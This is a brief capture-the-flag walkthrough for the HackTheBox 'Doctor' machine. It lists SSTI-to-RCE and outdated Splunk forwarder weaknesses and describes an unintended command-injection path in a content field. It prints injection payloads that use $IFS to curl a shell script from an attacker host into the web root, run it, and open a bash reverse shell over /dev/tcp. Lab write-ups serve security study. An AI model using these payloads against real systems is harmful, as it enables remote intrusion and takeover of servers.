../
htb doctor walkthrough
- doctor is an easy box from HTB
- vulnerable SSTI to RCE
- outdated splunk forwarder
- unintended RCE in content field
- as far as the unintended path since i don’t complete it i will explain it here:
first you will need to curl in a bash payload and save to /var/www/html
. next you will need to run it, so the payloads should look something like this:
# first payload
http://IP/$('curl'$IFS'http://IP/shell.sh'$IFS'-o'$IFS'/var/www/html/shell.sh')
# second payload
http://ip/$('bash'$IFS'/var/www/html/shell.sh')
# contents of shell.sh:
bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'
best, gerbsec